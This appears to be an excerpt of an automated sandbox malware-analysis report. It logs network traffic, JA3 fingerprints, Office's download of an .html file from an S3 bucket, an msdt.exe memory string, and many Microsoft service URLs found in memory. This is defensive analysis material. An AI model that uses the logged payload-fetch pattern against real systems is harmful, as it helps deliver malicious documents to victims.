          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49758
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49758
          Source: global trafficTCP traffic: 192.168.2.3:49758 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49758
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49758
          Source: global trafficTCP traffic: 192.168.2.3:49758 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49758 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49758
          Source: global trafficTCP traffic: 192.168.2.3:49758 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49758 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49758 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49746 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49746 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49746 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49746 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49746 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49746 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49746 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49746 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49747 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49747 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49747 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49747 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49747 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49747 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49747 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49747 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49748 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49748 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49748 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49748 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49748 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49748 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49749 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49749 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49749 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49749 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49749 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49749 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49749 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49749 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49749 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49749 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49749 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49750 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49750 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49750 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49750 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49750 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49750 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49750 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49750 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49750 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49750 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49750 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49750 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49751 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49751 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49751 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49751 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49751 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49751 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49751 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49751 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49751 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49751 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49751 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49751 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49752 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49752 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49752 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49752 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49752 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49752 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49752 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49753 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49753 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49753 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49753 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49753 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49753 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49753 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49753 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49754 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49754 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49754 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49754 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49754 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49754 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49754 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49755 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49755 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49755 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49755 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49755 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49755 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49755 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49755 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49755 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49755 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49755 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49756 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49756 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49756 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49756 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49756 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49756 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49756 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49756 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49756 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49756 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49757 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49757 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49757 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49757 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49757 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49757 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49757 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49757 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49757 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49757 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49758 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49758 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49758 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49758 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49758 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49758 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49758 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49758 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49758 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49758 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49758 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49758 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49749 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49755 -> 52.95.143.42:443
          Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: global trafficHTTP traffic detected: GET /fb0f9c45-fb5f-4690-9815-e11a762d4739.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: sqdocs.s3.eu-west-2.amazonaws.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /fb0f9c45-fb5f-4690-9815-e11a762d4739.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: sqdocs.s3.eu-west-2.amazonaws.comIf-Modified-Since: Sat, 28 May 2022 14:15:08 GMTIf-None-Match: "bfbfa8fdda62476690c9077946372eaa"Connection: Keep-Alive
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
          Source: msdt.exe, 0000000C.00000002.563441642.000000000077F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://api.aadrm.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://api.aadrm.com/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://api.cortana.ai
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://api.diagnostics.office.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://api.microsoftstream.com/api/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://api.office.net
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://api.onedrive.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://apis.live.net/v5.0/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://augloop.office.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://augloop.office.com/v2
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://cdn.entity.
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://clients.config.office.net/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://config.edge.skype.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://cortana.ai
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://cortana.ai/api
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://cr.office.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://dataservice.o365filtering.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://dataservice.o365filtering.com/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://dev.cortana.ai
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://devnull.onenote.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://directory.services.
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://enrichment.osi.office.net/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://graph.ppe.windows.net
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://graph.ppe.windows.net/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://graph.windows.net
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://graph.windows.net/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://incidents.diagnostics.office.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://invites.office.com/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://lifecycle.office.com
